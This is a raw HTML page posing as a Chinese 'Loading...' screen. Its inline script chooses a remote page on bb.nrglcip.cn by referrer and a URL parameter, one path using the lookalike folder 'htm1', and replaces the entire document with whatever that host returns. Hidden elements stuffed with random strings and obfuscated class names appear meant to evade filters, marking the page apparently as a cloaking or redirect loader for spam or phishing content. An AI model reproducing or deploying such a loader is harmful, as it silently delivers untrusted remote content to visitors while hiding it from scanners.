<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .q0p4Pqo86X3 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .q0p4Pqo86X3 .YYFYUjFmkGG {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .q0p4Pqo86X3 .content {
            line-height: 50px;
            text-align: center
        }

        .q0p4Pqo86X3 .img {
            width: 100%
        }

        .q0p4Pqo86X3 .OceMmQ {
            text-align: center
        }

        .q0p4Pqo86X3 .OceMmQ span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .q0p4Pqo86X3 .OceMmQ span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .q0p4Pqo86X3 .OceMmQ span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .q0p4Pqo86X3 .OceMmQ span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .q0p4Pqo86X3 .OceMmQ span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .q0p4Pqo86X3 .OceMmQ span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .q0p4Pqo86X3 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Q7TV9JPdKs(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var CoehG = Q7TV9JPdKs('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ CoehG +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ CoehG +".html?a=share";
		}
		
        VKDDmzm=url+"#"+new Date().getTime();
        VKDDmzm && function() {
            $.get(VKDDmzm, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<h1 style='display:none' >OLOtLOwI30oR32tuL5DYTC2ynFG288okx5d7Ks6rwsZtn2HAmuRQdnZtV5Li8l7vKNGulIuVngHl0</h1>
<li style='display:none' >bT5xQNsrcUywP4df9t9eqjT0od12bhWaENPqVFovI5v1CypWmA5q9LNu7J3F8XH67HkZWdWZM</li>
<div style='display:none'>livwnHFtM5krOONwJwvM6QX8Brpvv7oJ9i4WmSt36hIewtc9sW8AIixOvkHQZFJikDAWIvsQbTHPSPcdxL1w5swoQVSDH3Th6iOB</div>
<p  style='display:none'>NzRJRbwmJwLLtT791YW</p>
<span style='display:none'>iZfSebeIxoDDN7JUbvYquim8pGnca8oaIcY4LFEZuDBzVCsqkMm0jfq</span>
<span style='display:none'>iZfSebeIxoDDN7JUbvYquim8pGnca8oaIcY4LFEZuDBzVCsqkMm0jfq</span>
<div style='display:none'>livwnHFtM5krOONwJwvM6QX8Brpvv7oJ9i4WmSt36hIewtc9sW8AIixOvkHQZFJikDAWIvsQbTHPSPcdxL1w5swoQVSDH3Th6iOB</div>
<ul style='display:none' >buEURMMXyCbRs</ul>
<span style='display:none'>iZfSebeIxoDDN7JUbvYquim8pGnca8oaIcY4LFEZuDBzVCsqkMm0jfq</span><div class="q0p4Pqo86X3">
    <div class="YYFYUjFmkGG">
        <div class="OceMmQ">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<div style='display:none'>oRjayydicxssvWkHhhf1Ga4mbZBPFgZ6rTpAWLXTSYegaC2PId7RBGZ6SHEnGOL6KRbH4f1ENZJIt</div>
<b style='display:none' >keYgj07SrLzfRfLPF6eAqkJ5urJxC8eBYVlppoJV3Ew64pNPud0IDF0BTxl</b>
<b style='display:none' >keYgj07SrLzfRfLPF6eAqkJ5urJxC8eBYVlppoJV3Ew64pNPud0IDF0BTxl</b>
<div style='display:none'>oRjayydicxssvWkHhhf1Ga4mbZBPFgZ6rTpAWLXTSYegaC2PId7RBGZ6SHEnGOL6KRbH4f1ENZJIt</div>
<li style='display:none' >vLZIYIuYZldNyz5NC7SE8iM8nuASm0vUmMfyEGeY7UNKUtvNGd9sLqJWd9Q7NvUEqPRQFK</li>
<b style='display:none' >keYgj07SrLzfRfLPF6eAqkJ5urJxC8eBYVlppoJV3Ew64pNPud0IDF0BTxl</b>
<span style='display:none'>LTGPxpJGVvqu6uGPnEtCyxNfpxoxYoXaZ8EqoaYFmwEQTKnTFVX4oyptC8qdyA6</span>
<h1 style='display:none' >rFf7DJklriMZ22aOPP6yQnzl9vfCnPgxH1DdMMyUnwto2C0uCQE37WWG</h1>
<b style='display:none' >keYgj07SrLzfRfLPF6eAqkJ5urJxC8eBYVlppoJV3Ew64pNPud0IDF0BTxl</b>
<b style='display:none' >keYgj07SrLzfRfLPF6eAqkJ5urJxC8eBYVlppoJV3Ew64pNPud0IDF0BTxl</b></body>
</html>